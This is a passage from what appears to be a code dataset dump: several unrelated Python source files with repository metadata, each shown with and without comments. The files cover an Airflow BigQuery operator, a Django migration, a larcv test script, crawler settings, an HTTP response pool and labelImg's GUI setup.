        if self.force_rerun:
            hash_base = str(uuid.uuid4())
        else:
            hash_base = json.dumps(self.configuration, sort_keys=True)
        uniqueness_suffix = hashlib.md5(hash_base.encode()).hexdigest()
        if self.job_id:
            return f"{self.job_id}_{uniqueness_suffix}"
        exec_date = context['execution_date'].isoformat()
        job_id = f"airflow_{self.dag_id}_{self.task_id}_{exec_date}_{uniqueness_suffix}"
        # Sanitize: replace ':', '-', '+' and '.' with underscores.
        return re.sub(r"[:\-+.]", "_", job_id)
    def execute(self, context: Any):
        """Submit (or reattach to) the BigQuery job; return its job id."""
        hook = BigQueryHook(
            gcp_conn_id=self.gcp_conn_id,
            delegate_to=self.delegate_to,
            impersonation_chain=self.impersonation_chain,
        )
        self.hook = hook
        job_id = self._job_id(context)
        try:
            job = self._submit_job(hook, job_id)
            self._handle_job_error(job)
        except Conflict:
            # A job with this id already exists: fetch it and decide whether
            # to reattach (wait on it) or fail with guidance.
            job = hook.get_job(
                project_id=self.project_id,
                location=self.location,
                job_id=job_id,
            )
            if job.state in self.reattach_states:
                # Reattach: wait for the existing job and surface its errors.
                job.result()
                self._handle_job_error(job)
            else:
                raise AirflowException(
                    f"Job with id: {job_id} already exists and is in {job.state} state. If you "
                    f"want to force rerun it consider setting `force_rerun=True`."
                    f"Or, if you want to reattach in this scenario add {job.state} to `reattach_states`"
                )
        self.job_id = job.job_id
        return job.job_id
    def on_kill(self) -> None:
        """Cancel the submitted job when the task is killed (unless disabled)."""
        if self.job_id and self.cancel_on_kill:
            self.hook.cancel_job(
                job_id=self.job_id, project_id=self.project_id, location=self.location
            )
| true | true |
1c2cbf15826a996a1947210df20821f4e3e41bb5 | 840 | py | Python | migrations/0021_auto_20160910_2144.py | jrandson/RememberTheCheese | 2d5d6752046650106bbf3e7e9c20c9efad9e700d | [
"MIT"
] | null | null | null | migrations/0021_auto_20160910_2144.py | jrandson/RememberTheCheese | 2d5d6752046650106bbf3e7e9c20c9efad9e700d | [
"MIT"
] | null | null | null | migrations/0021_auto_20160910_2144.py | jrandson/RememberTheCheese | 2d5d6752046650106bbf3e7e9c20c9efad9e700d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-09-10 21:44
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Auto-generated migration (Django 1.9, per the header comment): refresh
    # the default of the 'deadline' DateTimeField on both Subtask and Task.
    # NOTE: the defaults are literal timestamps frozen at makemigrations time,
    # not dynamic values.
    dependencies = [
        ('rememberTheCheese', '0020_auto_20160910_2140'),
    ]
    operations = [
        migrations.AlterField(
            model_name='subtask',
            name='deadline',
            field=models.DateTimeField(default=datetime.datetime(2016, 9, 13, 21, 43, 59, 893406, tzinfo=utc), verbose_name='deadline'),
        ),
        migrations.AlterField(
            model_name='task',
            name='deadline',
            field=models.DateTimeField(default=datetime.datetime(2016, 9, 13, 21, 43, 59, 891576, tzinfo=utc), verbose_name='deadline'),
        ),
    ]
| 30 | 136 | 0.641667 |
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    # Auto-generated Django migration (comment-stripped duplicate copy):
    # refresh the frozen default of the 'deadline' DateTimeField on both
    # Subtask and Task. The defaults are timestamps captured when
    # makemigrations ran, not dynamic values.
    dependencies = [
        ('rememberTheCheese', '0020_auto_20160910_2140'),
    ]
    operations = [
        migrations.AlterField(
            model_name='subtask',
            name='deadline',
            field=models.DateTimeField(default=datetime.datetime(2016, 9, 13, 21, 43, 59, 893406, tzinfo=utc), verbose_name='deadline'),
        ),
        migrations.AlterField(
            model_name='task',
            name='deadline',
            field=models.DateTimeField(default=datetime.datetime(2016, 9, 13, 21, 43, 59, 891576, tzinfo=utc), verbose_name='deadline'),
        ),
    ]
| true | true |
1c2cbf4cdf2f8864641caba9691bf5de28a27646 | 1,643 | py | Python | src/larcv3/app/imagemod/test/test_CropROI.py | zhulcher/larcv3 | 26d1ad33f0c27ddf6bb2c56bc0238aeaddcb772b | [
"MIT"
] | 14 | 2017-10-19T15:08:29.000Z | 2021-03-31T21:21:07.000Z | src/larcv3/app/imagemod/test/test_CropROI.py | zhulcher/larcv3 | 26d1ad33f0c27ddf6bb2c56bc0238aeaddcb772b | [
"MIT"
] | 34 | 2019-05-15T13:33:10.000Z | 2022-03-22T17:54:49.000Z | src/larcv3/app/imagemod/test/test_CropROI.py | zhulcher/larcv3 | 26d1ad33f0c27ddf6bb2c56bc0238aeaddcb772b | [
"MIT"
] | 16 | 2017-12-07T12:04:40.000Z | 2021-11-15T00:53:31.000Z | from larcv import larcv
from colored_msg import colored_msg as cmsg
import os, sys
larcv.logger.force_level(0)
#
# Constants
#
MSG_LEVEL=larcv.msg.kERROR
if 'debug' in sys.argv:
MSG_LEVEL = larcv.msg.kDEBUG
if 'info' in sys.argv:
MSG_LEVEL = larcv.msg.kINFO
OUT_FNAME="croproi.root"
NUM_EVENT=1
ERROR_FILE_EXIST = 1
ERROR_WRITE_INIT = 2
if os.path.isfile(OUT_FNAME):
cmsg.error("Test output file (%s) already exists..." % OUT_FNAME)
sys.exit(ERROR_FILE_EXIST)
from larcv import larcv
o=larcv.IOManager(larcv.IOManager.kWRITE)
o.reset()
o.set_verbosity(MSG_LEVEL)
o.set_out_file(OUT_FNAME)
p = larcv.CropROI()
cfg = larcv.CreatePSetFromFile(sys.argv[1],"CropROI")
p.configure(cfg)
p.initialize()
if not o.initialize():
sys.exit(ERROR_WRITE_INIT)
for idx in xrange(NUM_EVENT):
img = larcv.Image2D(10,10)
for x in xrange(img.as_vector().size()):
img.set_pixel(x,x%3)
event_image1 = o.get_data(larcv.kProductImage2D,"original")
event_image1.Append(img)
event_image2 = o.get_data(larcv.kProductImage2D,"target")
event_image2.Append(img)
roi = larcv.ROI()
#ImageMeta(const double width=0., const double height=0.,
# const size_t row_count=0., const size_t col_count=0,
# const double origin_x=0., const double origin_y=0.,
# const PlaneID_t plane=::larcv::kINVALID_PLANE)
meta = larcv.ImageMeta(3,3,3,3,2,-2,0)
roi.AppendBB(meta)
event_roi = o.get_data(larcv.kProductROI,"roi")
event_roi.Append(roi)
o.set_id(0,0,idx)
p.process(o)
o.save_entry()
idx+=1
p.finalize()
o.finalize()
| 24.893939 | 69 | 0.685332 | from larcv import larcv
# Comment-stripped duplicate of the larcv CropROI test: writes NUM_EVENT
# synthetic events (two 10x10 images plus one ROI) to OUT_FNAME, running
# CropROI over each. argv[1] must contain a "CropROI" PSet; "debug"/"info"
# raise the logger verbosity. Python 2 code (xrange).
from colored_msg import colored_msg as cmsg
import os, sys
larcv.logger.force_level(0)
MSG_LEVEL=larcv.msg.kERROR
if 'debug' in sys.argv:
    MSG_LEVEL = larcv.msg.kDEBUG
if 'info' in sys.argv:
    MSG_LEVEL = larcv.msg.kINFO
OUT_FNAME="croproi.root"
NUM_EVENT=1
# Process exit codes.
ERROR_FILE_EXIST = 1
ERROR_WRITE_INIT = 2
# Refuse to clobber an existing output file.
if os.path.isfile(OUT_FNAME):
    cmsg.error("Test output file (%s) already exists..." % OUT_FNAME)
    sys.exit(ERROR_FILE_EXIST)
from larcv import larcv
o=larcv.IOManager(larcv.IOManager.kWRITE)
o.reset()
o.set_verbosity(MSG_LEVEL)
o.set_out_file(OUT_FNAME)
# Configure the CropROI processor from the "CropROI" PSet in argv[1].
p = larcv.CropROI()
cfg = larcv.CreatePSetFromFile(sys.argv[1],"CropROI")
p.configure(cfg)
p.initialize()
if not o.initialize():
    sys.exit(ERROR_WRITE_INIT)
for idx in xrange(NUM_EVENT):
    # 10x10 image whose pixel values cycle 0,1,2 along the raster index.
    img = larcv.Image2D(10,10)
    for x in xrange(img.as_vector().size()):
        img.set_pixel(x,x%3)
    event_image1 = o.get_data(larcv.kProductImage2D,"original")
    event_image1.Append(img)
    event_image2 = o.get_data(larcv.kProductImage2D,"target")
    event_image2.Append(img)
    roi = larcv.ROI()
    meta = larcv.ImageMeta(3,3,3,3,2,-2,0)
    roi.AppendBB(meta)
    event_roi = o.get_data(larcv.kProductROI,"roi")
    event_roi.Append(roi)
    o.set_id(0,0,idx)
    p.process(o)
    o.save_entry()
    # NOTE(review): redundant — idx is the loop variable, reassigned each pass.
    idx+=1
p.finalize()
o.finalize()
| true | true |
1c2cc00dcbadfc3b16eb935075aa55c13af58b40 | 259 | py | Python | douban/douban/__init__.py | fourierrr/Crawler | 63abc990cf5d1ee8fd3027c9c5f609e98c4fa06b | [
"Apache-2.0"
] | null | null | null | douban/douban/__init__.py | fourierrr/Crawler | 63abc990cf5d1ee8fd3027c9c5f609e98c4fa06b | [
"Apache-2.0"
] | null | null | null | douban/douban/__init__.py | fourierrr/Crawler | 63abc990cf5d1ee8fd3027c9c5f609e98c4fa06b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# @Author: Nessaj
# @Date:   2018-04-04 23:08:36
# @Last Modified by:   Nessaj
# @Last Modified time: 2018-04-07 11:38:10

# Crawler configuration constants — presumably Scrapy settings (the names
# match Scrapy's convention); confirm against the project's settings module.
BOT_NAME = 'douban'
# Module(s) scanned for spider classes / where new spiders are generated.
SPIDER_MODULES = ['douban.spiders']
NEWSPIDER_MODULE = 'douban.spiders'
# Delay of 2 between requests — presumably seconds of politeness throttling.
DOWNLOAD_DELAY = 2
| 21.583333 | 42 | 0.675676 |
# Comment-stripped duplicate of the crawler configuration constants —
# presumably Scrapy settings (names match Scrapy's convention); confirm.
BOT_NAME = 'douban'
SPIDER_MODULES = ['douban.spiders']
NEWSPIDER_MODULE = 'douban.spiders'
# Delay of 2 between requests — presumably seconds of politeness throttling.
DOWNLOAD_DELAY = 2
| true | true |
1c2cc134d84ed2afa98d398383c927965b9c3b0e | 1,183 | py | Python | src/japronto/response/py.py | devblack/japronto | 3016bd659047c76aa8f4431d304ba678d4c12a7f | [
"MIT"
] | 1 | 2021-08-18T05:42:12.000Z | 2021-08-18T05:42:12.000Z | src/japronto/response/py.py | devblack/japronto | 3016bd659047c76aa8f4431d304ba678d4c12a7f | [
"MIT"
] | null | null | null | src/japronto/response/py.py | devblack/japronto | 3016bd659047c76aa8f4431d304ba678d4c12a7f | [
"MIT"
] | null | null | null | _responses = None
def factory(status_code=200, text='', mime_type='text/plain',
encoding='utf-8'):
global _responses
if _responses is None:
_responses = [Response() for _ in range(100)]
response = _responses.pop()
response.status_code = status_code
response.mime_type = mime_type
response.text = text
response.encoding = encoding
return response
def dispose(response):
    """Return *response* to the shared pool so factory() can reuse it.

    NOTE(review): assumes factory() has run at least once — before that,
    _responses is still None and this raises AttributeError.
    """
    _responses.append(response)
class Response:
    """Minimal HTTP response container with a plain-Python serializer.

    Slotted to keep pooled instances small. render() always emits the
    reason phrase 'OK' and a keep-alive connection header, matching the
    original serialization byte for byte.
    """

    __slots__ = ('status_code', 'mime_type', 'text', 'encoding')

    def __init__(self, status_code=200, text='', mime_type='text/plain',
                 encoding='utf-8'):
        self.status_code = status_code
        self.mime_type = mime_type
        self.text = text
        self.encoding = encoding

    def render(self):
        """Serialize status line, headers and body into a single bytes blob."""
        payload = self.text.encode(self.encoding)
        header = (
            'HTTP/1.1 ' + str(self.status_code) + ' OK\r\n'
            + 'Connection: keep-alive\r\n'
            + 'Content-Type: ' + self.mime_type + '; encoding=' + self.encoding + '\r\n'
            + 'Content-Length: ' + str(len(payload)) + '\r\n\r\n'
        )
        return header.encode(self.encoding) + payload
| 26.886364 | 82 | 0.602705 | _responses = None
def factory(status_code=200, text='', mime_type='text/plain',
            encoding='utf-8'):
    """Return a Response from the shared pool, configured with the given fields.

    Duplicate (comment-stripped) copy of factory(). The pool is created
    lazily with 100 instances and replenished via dispose(). Robustness fix:
    the original's unconditional pop() raised IndexError once the pool was
    exhausted; an empty pool now falls back to allocating a fresh Response.
    """
    global _responses
    if _responses is None:
        _responses = [Response() for _ in range(100)]
    # Pop from the pool when possible; allocate when it has run dry.
    response = _responses.pop() if _responses else Response()
    response.status_code = status_code
    response.mime_type = mime_type
    response.text = text
    response.encoding = encoding
    return response
def dispose(response):
    """Return *response* to the shared pool so factory() can reuse it.

    NOTE(review): assumes factory() has run at least once — before that,
    _responses is still None and this raises AttributeError.
    """
    _responses.append(response)
class Response:
    """Minimal HTTP response container with a plain-Python serializer
    (duplicate, comment-stripped copy).

    Slotted to keep pooled instances small. render() always emits the
    reason phrase 'OK' and a keep-alive connection header, matching the
    original serialization byte for byte.
    """

    __slots__ = ('status_code', 'mime_type', 'text', 'encoding')

    def __init__(self, status_code=200, text='', mime_type='text/plain',
                 encoding='utf-8'):
        self.status_code = status_code
        self.mime_type = mime_type
        self.text = text
        self.encoding = encoding

    def render(self):
        """Serialize status line, headers and body into a single bytes blob."""
        payload = self.text.encode(self.encoding)
        header = (
            'HTTP/1.1 ' + str(self.status_code) + ' OK\r\n'
            + 'Connection: keep-alive\r\n'
            + 'Content-Type: ' + self.mime_type + '; encoding=' + self.encoding + '\r\n'
            + 'Content-Length: ' + str(len(payload)) + '\r\n\r\n'
        )
        return header.encode(self.encoding) + payload
| true | true |
1c2cc168d3eec7f525221d461b8001bccd8f43a1 | 64,551 | py | Python | Tensorflow/labelImg/labelImg.py | KevzPeter/Signify-Sign-Language-Speech-Converter | facfbb33ab2540e26124e3ca96142caaa57480e3 | [
"MIT"
] | null | null | null | Tensorflow/labelImg/labelImg.py | KevzPeter/Signify-Sign-Language-Speech-Converter | facfbb33ab2540e26124e3ca96142caaa57480e3 | [
"MIT"
] | null | null | null | Tensorflow/labelImg/labelImg.py | KevzPeter/Signify-Sign-Language-Speech-Converter | facfbb33ab2540e26124e3ca96142caaa57480e3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import codecs
import distutils.spawn
import os.path
import platform
import re
import sys
import subprocess
from functools import partial
from collections import defaultdict
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
except ImportError:
# needed for py3+qt4
# Ref:
# http://pyqt.sourceforge.net/Docs/PyQt4/incompatible_apis.html
# http://stackoverflow.com/questions/21217399/pyqt4-qtcore-qvariant-object-instead-of-a-string
if sys.version_info.major >= 3:
import sip
sip.setapi('QVariant', 2)
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from combobox import ComboBox
from libs.resources import *
from libs.constants import *
from libs.utils import *
from libs.settings import Settings
from libs.shape import Shape, DEFAULT_LINE_COLOR, DEFAULT_FILL_COLOR
from libs.stringBundle import StringBundle
from libs.canvas import Canvas
from libs.zoomWidget import ZoomWidget
from libs.labelDialog import LabelDialog
from libs.colorDialog import ColorDialog
from libs.labelFile import LabelFile, LabelFileError, LabelFileFormat
from libs.toolBar import ToolBar
from libs.pascal_voc_io import PascalVocReader
from libs.pascal_voc_io import XML_EXT
from libs.yolo_io import YoloReader
from libs.yolo_io import TXT_EXT
from libs.create_ml_io import CreateMLReader
from libs.create_ml_io import JSON_EXT
from libs.ustr import ustr
from libs.hashableQListWidgetItem import HashableQListWidgetItem
# Application name, used in the window title and status-bar messages.
__appname__ = 'labelImg'
class WindowMixin(object):
    """Mixin adding menu and toolbar construction helpers to a main window."""

    def menu(self, title, actions=None):
        """Add a menu named *title* to the menu bar, optionally populated with *actions*."""
        new_menu = self.menuBar().addMenu(title)
        if actions:
            addActions(new_menu, actions)
        return new_menu

    def toolbar(self, title, actions=None):
        """Create a left-docked toolbar named *title* with text-under-icon buttons."""
        bar = ToolBar(title)
        bar.setObjectName(u'%sToolBar' % title)
        # bar.setOrientation(Qt.Vertical)
        bar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
        if actions:
            addActions(bar, actions)
        self.addToolBar(Qt.LeftToolBarArea, bar)
        return bar
class MainWindow(QMainWindow, WindowMixin):
FIT_WINDOW, FIT_WIDTH, MANUAL_ZOOM = list(range(3))
def __init__(self, defaultFilename=None, defaultPrefdefClassFile=None, defaultSaveDir=None):
    """Build the main window: widgets, docks, actions, menus, and restore settings.

    defaultFilename: image file or directory to open on startup.
    defaultPrefdefClassFile: text file of predefined label classes.
    defaultSaveDir: directory annotations are saved to by default.
    """
    super(MainWindow, self).__init__()
    self.setWindowTitle(__appname__)
    # Load setting in the main thread
    self.settings = Settings()
    self.settings.load()
    settings = self.settings
    # Load string bundle for i18n
    self.stringBundle = StringBundle.getBundle()
    getStr = lambda strId: self.stringBundle.getString(strId)
    # Save as Pascal voc xml
    self.defaultSaveDir = defaultSaveDir
    self.labelFileFormat = settings.get(SETTING_LABEL_FILE_FORMAT, LabelFileFormat.PASCAL_VOC)
    # For loading all image under a directory
    self.mImgList = []
    self.dirname = None
    self.labelHist = []
    self.lastOpenDir = None
    # Whether we need to save or not.
    self.dirty = False
    self._noSelectionSlot = False
    self._beginner = True
    self.screencastViewer = self.getAvailableScreencastViewer()
    self.screencast = "https://youtu.be/p0nR2YsCY_U"
    # Load predefined classes to the list
    self.loadPredefinedClasses(defaultPrefdefClassFile)
    # Main widgets and related state.
    self.labelDialog = LabelDialog(parent=self, listItem=self.labelHist)
    # Two-way maps between list items and canvas shapes.
    self.itemsToShapes = {}
    self.shapesToItems = {}
    self.prevLabelText = ''
    listLayout = QVBoxLayout()
    listLayout.setContentsMargins(0, 0, 0, 0)
    # Create a widget for using default label
    self.useDefaultLabelCheckbox = QCheckBox(getStr('useDefaultLabel'))
    self.useDefaultLabelCheckbox.setChecked(False)
    self.defaultLabelTextLine = QLineEdit()
    useDefaultLabelQHBoxLayout = QHBoxLayout()
    useDefaultLabelQHBoxLayout.addWidget(self.useDefaultLabelCheckbox)
    useDefaultLabelQHBoxLayout.addWidget(self.defaultLabelTextLine)
    useDefaultLabelContainer = QWidget()
    useDefaultLabelContainer.setLayout(useDefaultLabelQHBoxLayout)
    # Create a widget for edit and diffc button
    self.diffcButton = QCheckBox(getStr('useDifficult'))
    self.diffcButton.setChecked(False)
    self.diffcButton.stateChanged.connect(self.btnstate)
    self.editButton = QToolButton()
    self.editButton.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
    # Add some of widgets to listLayout
    listLayout.addWidget(self.editButton)
    listLayout.addWidget(self.diffcButton)
    listLayout.addWidget(useDefaultLabelContainer)
    # Create and add combobox for showing unique labels in group
    self.comboBox = ComboBox(self)
    listLayout.addWidget(self.comboBox)
    # Create and add a widget for showing current label items
    self.labelList = QListWidget()
    labelListContainer = QWidget()
    labelListContainer.setLayout(listLayout)
    self.labelList.itemActivated.connect(self.labelSelectionChanged)
    self.labelList.itemSelectionChanged.connect(self.labelSelectionChanged)
    self.labelList.itemDoubleClicked.connect(self.editLabel)
    # Connect to itemChanged to detect checkbox changes.
    self.labelList.itemChanged.connect(self.labelItemChanged)
    listLayout.addWidget(self.labelList)
    self.dock = QDockWidget(getStr('boxLabelText'), self)
    self.dock.setObjectName(getStr('labels'))
    self.dock.setWidget(labelListContainer)
    # File list dock on the right.
    self.fileListWidget = QListWidget()
    self.fileListWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)
    filelistLayout = QVBoxLayout()
    filelistLayout.setContentsMargins(0, 0, 0, 0)
    filelistLayout.addWidget(self.fileListWidget)
    fileListContainer = QWidget()
    fileListContainer.setLayout(filelistLayout)
    self.filedock = QDockWidget(getStr('fileList'), self)
    self.filedock.setObjectName(getStr('files'))
    self.filedock.setWidget(fileListContainer)
    # Central canvas inside a scroll area.
    self.zoomWidget = ZoomWidget()
    self.colorDialog = ColorDialog(parent=self)
    self.canvas = Canvas(parent=self)
    self.canvas.zoomRequest.connect(self.zoomRequest)
    self.canvas.setDrawingShapeToSquare(settings.get(SETTING_DRAW_SQUARE, False))
    scroll = QScrollArea()
    scroll.setWidget(self.canvas)
    scroll.setWidgetResizable(True)
    self.scrollBars = {
        Qt.Vertical: scroll.verticalScrollBar(),
        Qt.Horizontal: scroll.horizontalScrollBar()
    }
    self.scrollArea = scroll
    self.canvas.scrollRequest.connect(self.scrollRequest)
    self.canvas.newShape.connect(self.newShape)
    self.canvas.shapeMoved.connect(self.setDirty)
    self.canvas.selectionChanged.connect(self.shapeSelectionChanged)
    self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)
    self.setCentralWidget(scroll)
    self.addDockWidget(Qt.RightDockWidgetArea, self.dock)
    self.addDockWidget(Qt.RightDockWidgetArea, self.filedock)
    self.filedock.setFeatures(QDockWidget.DockWidgetFloatable)
    self.dockFeatures = QDockWidget.DockWidgetClosable | QDockWidget.DockWidgetFloatable
    self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
    # Actions
    # NOTE(review): several local names below (open, quit, close, help, copy)
    # shadow Python builtins within this scope.
    action = partial(newAction, self)
    quit = action(getStr('quit'), self.close,
                  'Ctrl+Q', 'quit', getStr('quitApp'))
    open = action(getStr('openFile'), self.openFile,
                  'Ctrl+O', 'open', getStr('openFileDetail'))
    opendir = action(getStr('openDir'), self.openDirDialog,
                     'Ctrl+u', 'open', getStr('openDir'))
    copyPrevBounding = action(getStr('copyPrevBounding'), self.copyPreviousBoundingBoxes,
                              'Ctrl+v', 'paste', getStr('copyPrevBounding'))
    changeSavedir = action(getStr('changeSaveDir'), self.changeSavedirDialog,
                           'Ctrl+r', 'open', getStr('changeSavedAnnotationDir'))
    openAnnotation = action(getStr('openAnnotation'), self.openAnnotationDialog,
                            'Ctrl+Shift+O', 'open', getStr('openAnnotationDetail'))
    openNextImg = action(getStr('nextImg'), self.openNextImg,
                         'd', 'next', getStr('nextImgDetail'))
    openPrevImg = action(getStr('prevImg'), self.openPrevImg,
                         'a', 'prev', getStr('prevImgDetail'))
    verify = action(getStr('verifyImg'), self.verifyImg,
                    'space', 'verify', getStr('verifyImgDetail'))
    save = action(getStr('save'), self.saveFile,
                  'Ctrl+S', 'save', getStr('saveDetail'), enabled=False)
    def getFormatMeta(format):
        """
        returns a tuple containing (title, icon_name) of the selected format
        """
        if format == LabelFileFormat.PASCAL_VOC:
            return ('&PascalVOC', 'format_voc')
        elif format == LabelFileFormat.YOLO:
            return ('&YOLO', 'format_yolo')
        elif format == LabelFileFormat.CREATE_ML:
            return ('&CreateML', 'format_createml')
    save_format = action(getFormatMeta(self.labelFileFormat)[0],
                         self.change_format, 'Ctrl+',
                         getFormatMeta(self.labelFileFormat)[1],
                         getStr('changeSaveFormat'), enabled=True)
    saveAs = action(getStr('saveAs'), self.saveFileAs,
                    'Ctrl+Shift+S', 'save-as', getStr('saveAsDetail'), enabled=False)
    close = action(getStr('closeCur'), self.closeFile, 'Ctrl+W', 'close', getStr('closeCurDetail'))
    deleteImg = action(getStr('deleteImg'), self.deleteImg, 'Ctrl+Shift+D', 'close', getStr('deleteImgDetail'))
    resetAll = action(getStr('resetAll'), self.resetAll, None, 'resetall', getStr('resetAllDetail'))
    color1 = action(getStr('boxLineColor'), self.chooseColor1,
                    'Ctrl+L', 'color_line', getStr('boxLineColorDetail'))
    createMode = action(getStr('crtBox'), self.setCreateMode,
                        'w', 'new', getStr('crtBoxDetail'), enabled=False)
    editMode = action('&Edit\nRectBox', self.setEditMode,
                      'Ctrl+J', 'edit', u'Move and edit Boxs', enabled=False)
    create = action(getStr('crtBox'), self.createShape,
                    'w', 'new', getStr('crtBoxDetail'), enabled=False)
    delete = action(getStr('delBox'), self.deleteSelectedShape,
                    'Delete', 'delete', getStr('delBoxDetail'), enabled=False)
    copy = action(getStr('dupBox'), self.copySelectedShape,
                  'Ctrl+D', 'copy', getStr('dupBoxDetail'),
                  enabled=False)
    advancedMode = action(getStr('advancedMode'), self.toggleAdvancedMode,
                          'Ctrl+Shift+A', 'expert', getStr('advancedModeDetail'),
                          checkable=True)
    hideAll = action('&Hide\nRectBox', partial(self.togglePolygons, False),
                     'Ctrl+H', 'hide', getStr('hideAllBoxDetail'),
                     enabled=False)
    showAll = action('&Show\nRectBox', partial(self.togglePolygons, True),
                     'Ctrl+A', 'hide', getStr('showAllBoxDetail'),
                     enabled=False)
    help = action(getStr('tutorial'), self.showTutorialDialog, None, 'help', getStr('tutorialDetail'))
    showInfo = action(getStr('info'), self.showInfoDialog, None, 'help', getStr('info'))
    zoom = QWidgetAction(self)
    zoom.setDefaultWidget(self.zoomWidget)
    self.zoomWidget.setWhatsThis(
        u"Zoom in or out of the image. Also accessible with"
        " %s and %s from the canvas." % (fmtShortcut("Ctrl+[-+]"),
                                         fmtShortcut("Ctrl+Wheel")))
    self.zoomWidget.setEnabled(False)
    zoomIn = action(getStr('zoomin'), partial(self.addZoom, 10),
                    'Ctrl++', 'zoom-in', getStr('zoominDetail'), enabled=False)
    zoomOut = action(getStr('zoomout'), partial(self.addZoom, -10),
                     'Ctrl+-', 'zoom-out', getStr('zoomoutDetail'), enabled=False)
    zoomOrg = action(getStr('originalsize'), partial(self.setZoom, 100),
                     'Ctrl+=', 'zoom', getStr('originalsizeDetail'), enabled=False)
    fitWindow = action(getStr('fitWin'), self.setFitWindow,
                       'Ctrl+F', 'fit-window', getStr('fitWinDetail'),
                       checkable=True, enabled=False)
    fitWidth = action(getStr('fitWidth'), self.setFitWidth,
                      'Ctrl+Shift+F', 'fit-width', getStr('fitWidthDetail'),
                      checkable=True, enabled=False)
    # Group zoom controls into a list for easier toggling.
    zoomActions = (self.zoomWidget, zoomIn, zoomOut,
                   zoomOrg, fitWindow, fitWidth)
    self.zoomMode = self.MANUAL_ZOOM
    self.scalers = {
        self.FIT_WINDOW: self.scaleFitWindow,
        self.FIT_WIDTH: self.scaleFitWidth,
        # Set to one to scale to 100% when loading files.
        self.MANUAL_ZOOM: lambda: 1,
    }
    edit = action(getStr('editLabel'), self.editLabel,
                  'Ctrl+E', 'edit', getStr('editLabelDetail'),
                  enabled=False)
    self.editButton.setDefaultAction(edit)
    shapeLineColor = action(getStr('shapeLineColor'), self.chshapeLineColor,
                            icon='color_line', tip=getStr('shapeLineColorDetail'),
                            enabled=False)
    shapeFillColor = action(getStr('shapeFillColor'), self.chshapeFillColor,
                            icon='color', tip=getStr('shapeFillColorDetail'),
                            enabled=False)
    labels = self.dock.toggleViewAction()
    labels.setText(getStr('showHide'))
    labels.setShortcut('Ctrl+Shift+L')
    # Label list context menu.
    labelMenu = QMenu()
    addActions(labelMenu, (edit, delete))
    self.labelList.setContextMenuPolicy(Qt.CustomContextMenu)
    self.labelList.customContextMenuRequested.connect(
        self.popLabelListMenu)
    # Draw squares/rectangles
    self.drawSquaresOption = QAction('Draw Squares', self)
    self.drawSquaresOption.setShortcut('Ctrl+Shift+R')
    self.drawSquaresOption.setCheckable(True)
    self.drawSquaresOption.setChecked(settings.get(SETTING_DRAW_SQUARE, False))
    self.drawSquaresOption.triggered.connect(self.toogleDrawSquare)
    # Store actions for further handling.
    self.actions = struct(save=save, save_format=save_format, saveAs=saveAs, open=open, close=close, resetAll = resetAll, deleteImg = deleteImg,
                          lineColor=color1, create=create, delete=delete, edit=edit, copy=copy,
                          createMode=createMode, editMode=editMode, advancedMode=advancedMode,
                          shapeLineColor=shapeLineColor, shapeFillColor=shapeFillColor,
                          zoom=zoom, zoomIn=zoomIn, zoomOut=zoomOut, zoomOrg=zoomOrg,
                          fitWindow=fitWindow, fitWidth=fitWidth,
                          zoomActions=zoomActions,
                          fileMenuActions=(
                              open, opendir, save, saveAs, close, resetAll, quit),
                          beginner=(), advanced=(),
                          editMenu=(edit, copy, delete,
                                    None, color1, self.drawSquaresOption),
                          beginnerContext=(create, edit, copy, delete),
                          advancedContext=(createMode, editMode, edit, copy,
                                           delete, shapeLineColor, shapeFillColor),
                          onLoadActive=(
                              close, create, createMode, editMode),
                          onShapesPresent=(saveAs, hideAll, showAll))
    self.menus = struct(
        file=self.menu('&File'),
        edit=self.menu('&Edit'),
        view=self.menu('&View'),
        help=self.menu('&Help'),
        recentFiles=QMenu('Open &Recent'),
        labelList=labelMenu)
    # Auto saving : Enable auto saving if pressing next
    self.autoSaving = QAction(getStr('autoSaveMode'), self)
    self.autoSaving.setCheckable(True)
    self.autoSaving.setChecked(settings.get(SETTING_AUTO_SAVE, False))
    # Sync single class mode from PR#106
    self.singleClassMode = QAction(getStr('singleClsMode'), self)
    self.singleClassMode.setShortcut("Ctrl+Shift+S")
    self.singleClassMode.setCheckable(True)
    self.singleClassMode.setChecked(settings.get(SETTING_SINGLE_CLASS, False))
    self.lastLabel = None
    # Add option to enable/disable labels being displayed at the top of bounding boxes
    self.displayLabelOption = QAction(getStr('displayLabel'), self)
    self.displayLabelOption.setShortcut("Ctrl+Shift+P")
    self.displayLabelOption.setCheckable(True)
    self.displayLabelOption.setChecked(settings.get(SETTING_PAINT_LABEL, False))
    self.displayLabelOption.triggered.connect(self.togglePaintLabelsOption)
    addActions(self.menus.file,
               (open, opendir, copyPrevBounding, changeSavedir, openAnnotation, self.menus.recentFiles, save, save_format, saveAs, close, resetAll, deleteImg, quit))
    addActions(self.menus.help, (help, showInfo))
    addActions(self.menus.view, (
        self.autoSaving,
        self.singleClassMode,
        self.displayLabelOption,
        labels, advancedMode, None,
        hideAll, showAll, None,
        zoomIn, zoomOut, zoomOrg, None,
        fitWindow, fitWidth))
    self.menus.file.aboutToShow.connect(self.updateFileMenu)
    # Custom context menu for the canvas widget:
    addActions(self.canvas.menus[0], self.actions.beginnerContext)
    addActions(self.canvas.menus[1], (
        action('&Copy here', self.copyShape),
        action('&Move here', self.moveShape)))
    self.tools = self.toolbar('Tools')
    self.actions.beginner = (
        open, opendir, changeSavedir, openNextImg, openPrevImg, verify, save, save_format, None, create, copy, delete, None,
        zoomIn, zoom, zoomOut, fitWindow, fitWidth)
    self.actions.advanced = (
        open, opendir, changeSavedir, openNextImg, openPrevImg, save, save_format, None,
        createMode, editMode, None,
        hideAll, showAll)
    self.statusBar().showMessage('%s started.' % __appname__)
